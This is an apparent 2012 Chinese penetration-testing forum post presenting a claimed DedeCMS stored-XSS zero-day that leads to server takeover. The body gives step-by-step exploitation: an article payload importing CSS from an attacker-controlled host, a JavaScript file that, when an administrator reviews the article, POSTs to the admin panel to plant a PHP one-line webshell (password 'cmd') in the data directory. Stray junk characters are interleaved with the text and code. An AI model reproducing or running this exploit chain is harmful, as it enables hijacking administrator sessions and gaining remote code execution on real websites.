找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1747|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
: r) a+ p& G- b为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)- b, Z% l; z# D6 `5 S0 T
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
+ [: f- R4 e% ?, T/ w下面说说利用方法。' [$ G1 X" ~+ e
条件有2个:
2 G! i& C; N! T( j: b" K, f1.开启注册
, ^3 F: q1 |- f2.开启投稿
! }( }& d" J" G/ {( j2 ~注册会员----发表文章& z; x. Z- w* |8 G8 H% O* S* ^
内容填写:
& i* O. ]# P& I: u* W复制代码' H7 V* V" G+ t
<style>@im\port'\http://xxx.com/xss.css';</style>
: B) a) s8 {( A- i新建XSS.Css
+ p  x6 ?# }3 l+ j, U6 L. ~2 ?复制代码
: o% f  k$ n: z2 Q- B5 ]7 A.body{
6 E* z. E1 @( I* R, ^- h7 ]# a( P! Bbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }2 w9 @! @! T4 }$ X& b- H
新建xss.js 内容为
/ ^, D4 @. ^+ b& T' d复制代码
5 p2 q. f6 L- L; V) O1.var request = false;
* }% P/ n  x* s6 u& B- T2.if(window.XMLHttpRequest) {
2 o" _' ]1 \& _( C" X3 K$ k: W3.request = new XMLHttpRequest();
- K# q  a9 Y8 q" i4 v, m( X4.if(request.overrideMimeType) {6 X( p8 `9 `2 T; X, ^+ O+ V5 K6 i
5.request.overrideMimeType('text/xml');
. Q. U% N+ w! l6.}
# s2 a3 ^% T! x: B7.} else if(window.ActiveXObject) {2 V7 D- W+ h6 d$ x
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
  X- p2 c# i: e; \' M9.for(var i=0; i<versions.length; i++) {) D" }5 y+ C6 ^0 L  U
10.try {
" A6 \( E2 I% Z1 u. V. l11.request = new ActiveXObject(versions);! a3 N  b  ^7 @  H
12.} catch(e) {}% a9 c+ J+ o! ?7 }8 E# [
13.}
4 ]$ p( L" Y8 m8 D: @6 b14.}6 `: h5 Q8 b) `9 i* T
15.xmlhttp=request;
( J  b8 ], M- z) z- V' y4 W0 A' ]16.function getFolder( url ){
# E- d4 y: U' L. @, r17. obj = url.split('/')
- _; i  N, b3 P! m  G+ i9 n18. return obj[obj.length-2]" m) Z7 n! m$ q. K
19.}5 D/ }8 s7 ^3 E, i% \% k
20.oUrl = top.location.href;6 _8 e2 I  f) `
21.u = getFolder(oUrl);
6 ^' w2 _" d$ P7 L3 B7 @22.add_admin();
$ R1 {* c8 U- s' P# t* s$ a$ v& k9 }23.function add_admin(){+ u, r5 F8 Z" C0 Y* x0 j+ \& b
24.var url= "/"+u+"/sys_sql_query.php";4 C  a+ m8 k( D
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
& ~2 l3 d9 s' u26.xmlhttp.open("POST", url, true);
# c% e( c+ a3 B# Y3 A/ z27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
( P. E; v  v, o; Y28.xmlhttp.setRequestHeader("Content-length", params.length);. s3 p3 U& {0 L9 Z2 P+ S; I
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");& G- a0 n( r  T3 ?( y
30.xmlhttp.send(params);
8 s$ D. }+ K& n; N7 o3 O31.}$ O% w/ e1 i. {' |/ ~0 g- U
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表